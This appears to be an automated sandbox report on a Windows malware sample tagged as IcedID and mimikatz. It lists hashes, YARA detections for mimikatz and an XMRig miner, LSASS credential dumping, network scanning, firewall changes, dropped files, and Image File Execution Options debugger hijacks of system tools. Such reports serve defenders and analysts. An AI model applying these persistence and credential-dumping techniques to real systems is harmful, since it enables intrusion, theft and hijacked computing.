Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
24-08-2024 07:29
Behavioral task
behavioral1
Sample
2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
9e4c48cee883bf2cd0a41aab45be3fdf
-
SHA1
cc145a1b696e3d89ee98f22b3964f4c0b121ea29
-
SHA256
9a8ed4ca0ed83b55af092169358d980d3da1a7974b865d0e708162ab2ff45503
-
SHA512
c62d6d0da25879d3d62ff6763d128f1914838e529589f7c7a99aa374f3611cc70a67dbddec531fe532303f4b59db5cafe02c72209eb332e7428a21bb78e5f849
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2776 created 676 2776 iyapfhp.exe 17 -
Contacts a large (16581) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/2464-190-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-199-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-227-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-233-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-234-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-235-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-248-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-252-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-253-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig behavioral1/memory/2464-256-0x000000013FB30000-0x000000013FC50000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 7 IoCs
resource yara_rule behavioral1/memory/2084-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/2084-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x0008000000016c03-5.dat mimikatz behavioral1/memory/2060-9-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/2292-135-0x0000000000440000-0x000000000052E000-memory.dmp mimikatz behavioral1/memory/1728-138-0x000000013F690000-0x000000013F77E000-memory.dmp mimikatz behavioral1/memory/2776-166-0x0000000002F70000-0x0000000003090000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts iyapfhp.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iyapfhp.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2944 netsh.exe 2156 netsh.exe -
Executes dropped EXE 19 IoCs
pid Process 2060 iyapfhp.exe 2776 iyapfhp.exe 1484 wpcap.exe 1504 eizbestpy.exe 1728 vfshost.exe 1544 xohudmc.exe 2868 dqljao.exe 3044 bieqttlep.exe 2464 yetdzn.exe 1900 bieqttlep.exe 2700 bieqttlep.exe 1876 bieqttlep.exe 2056 bieqttlep.exe 2220 bieqttlep.exe 2348 bieqttlep.exe 604 bieqttlep.exe 2932 iyapfhp.exe 3032 yznluuqri.exe 3764 iyapfhp.exe -
Loads dropped DLL 25 IoCs
pid Process 2384 cmd.exe 2384 cmd.exe 588 cmd.exe 1484 wpcap.exe 1484 wpcap.exe 1484 wpcap.exe 1484 wpcap.exe 1484 wpcap.exe 1612 cmd.exe 1504 eizbestpy.exe 1504 eizbestpy.exe 2292 cmd.exe 2292 cmd.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 2776 iyapfhp.exe 624 cmd.exe -
resource yara_rule behavioral1/files/0x000500000001a4a9-133.dat upx behavioral1/memory/1728-136-0x000000013F690000-0x000000013F77E000-memory.dmp upx behavioral1/memory/1728-138-0x000000013F690000-0x000000013F77E000-memory.dmp upx behavioral1/files/0x000500000001a4c1-159.dat upx behavioral1/memory/2776-161-0x0000000001A50000-0x0000000001AAB000-memory.dmp upx behavioral1/files/0x000500000001a4c5-164.dat upx behavioral1/memory/2464-168-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/3044-170-0x000000013FDC0000-0x000000013FE1B000-memory.dmp upx behavioral1/memory/1900-178-0x000000013F090000-0x000000013F0EB000-memory.dmp upx behavioral1/memory/1900-180-0x000000013F090000-0x000000013F0EB000-memory.dmp upx behavioral1/memory/2776-184-0x0000000001A50000-0x0000000001AAB000-memory.dmp upx behavioral1/memory/2700-187-0x000000013F9A0000-0x000000013F9FB000-memory.dmp upx behavioral1/memory/2464-190-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2776-193-0x0000000001A50000-0x0000000001AAB000-memory.dmp upx behavioral1/memory/1876-197-0x000000013F2B0000-0x000000013F30B000-memory.dmp upx behavioral1/memory/2464-199-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2056-203-0x000000013F660000-0x000000013F6BB000-memory.dmp upx behavioral1/memory/2056-205-0x000000013F660000-0x000000013F6BB000-memory.dmp upx behavioral1/memory/2776-208-0x0000000001A50000-0x0000000001AAB000-memory.dmp upx behavioral1/memory/2220-212-0x000000013FF00000-0x000000013FF5B000-memory.dmp upx behavioral1/memory/2348-219-0x000000013FF00000-0x000000013FF5B000-memory.dmp upx behavioral1/memory/604-225-0x000000013F2B0000-0x000000013F30B000-memory.dmp upx behavioral1/memory/2464-227-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2464-233-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2464-234-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2464-235-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2464-248-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2464-252-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2464-253-0x000000013FB30000-0x000000013FC50000-memory.dmp upx behavioral1/memory/2464-256-0x000000013FB30000-0x000000013FC50000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ifconfig.me 19 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\dqljao.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iyapfhp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE iyapfhp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat iyapfhp.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\dqljao.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iyapfhp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE iyapfhp.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\fvaftrpep\UnattendGC\specials\ssleay32.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\ucl.dll iyapfhp.exe File opened for modification C:\Windows\kiprrupu\spoolsrv.xml iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\AppCapture64.dll iyapfhp.exe File created C:\Windows\fvaftrpep\fiasmtlvz\scan.bat iyapfhp.exe File opened for modification C:\Windows\fvaftrpep\fiasmtlvz\Packet.dll iyapfhp.exe File created C:\Windows\fvaftrpep\fiasmtlvz\yznluuqri.exe iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\libxml2.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\svschost.xml iyapfhp.exe File created C:\Windows\fvaftrpep\Corporate\mimidrv.sys iyapfhp.exe File opened for modification C:\Windows\kiprrupu\iyapfhp.exe 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe File created C:\Windows\fvaftrpep\fiasmtlvz\Packet.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\crli-0.dll iyapfhp.exe File created C:\Windows\kiprrupu\spoolsrv.xml iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\trfo-2.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\vimpcsvc.xml iyapfhp.exe File created C:\Windows\fvaftrpep\fiasmtlvz\wpcap.exe iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\posh-0.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\zlib1.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\tibe-2.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\tucl-1.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\spoolsrv.xml iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\svschost.xml iyapfhp.exe File created C:\Windows\kiprrupu\svschost.xml iyapfhp.exe File created C:\Windows\fvaftrpep\upbdrjv\swrpwe.exe iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\docmicfg.exe iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\schoedcl.xml iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\Shellcode.ini iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\vimpcsvc.xml iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\schoedcl.xml iyapfhp.exe File opened for modification C:\Windows\kiprrupu\vimpcsvc.xml iyapfhp.exe File opened for modification C:\Windows\kiprrupu\schoedcl.xml iyapfhp.exe File opened for modification C:\Windows\fvaftrpep\Corporate\log.txt cmd.exe File created C:\Windows\kiprrupu\iyapfhp.exe 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\coli-0.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\AppCapture32.dll iyapfhp.exe File created C:\Windows\fvaftrpep\Corporate\mimilib.dll iyapfhp.exe File created C:\Windows\fvaftrpep\fiasmtlvz\ip.txt iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\cnli-1.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\svschost.exe iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\spoolsrv.xml iyapfhp.exe File created C:\Windows\kiprrupu\vimpcsvc.xml iyapfhp.exe File opened for modification C:\Windows\fvaftrpep\fiasmtlvz\Result.txt yznluuqri.exe File created C:\Windows\fvaftrpep\fiasmtlvz\wpcap.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\libeay32.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\vimpcsvc.exe iyapfhp.exe File opened for modification C:\Windows\kiprrupu\svschost.xml iyapfhp.exe File opened for modification C:\Windows\kiprrupu\docmicfg.xml iyapfhp.exe File created C:\Windows\fvaftrpep\fiasmtlvz\eizbestpy.exe iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\docmicfg.xml iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\docmicfg.xml iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\trch-1.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\xdvl-0.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\schoedcl.exe iyapfhp.exe File created C:\Windows\kiprrupu\docmicfg.xml iyapfhp.exe File created C:\Windows\ime\iyapfhp.exe iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\exma-1.dll iyapfhp.exe File created C:\Windows\fvaftrpep\UnattendGC\specials\spoolsrv.exe iyapfhp.exe File created C:\Windows\kiprrupu\schoedcl.xml iyapfhp.exe File created C:\Windows\fvaftrpep\Corporate\vfshost.exe iyapfhp.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1632 sc.exe 852 sc.exe 2104 sc.exe 2252 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iyapfhp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eizbestpy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-24_9e4c48cee883bf2cd0a41aab45be3fdf_hacktools_icedid_mimikatz.exe 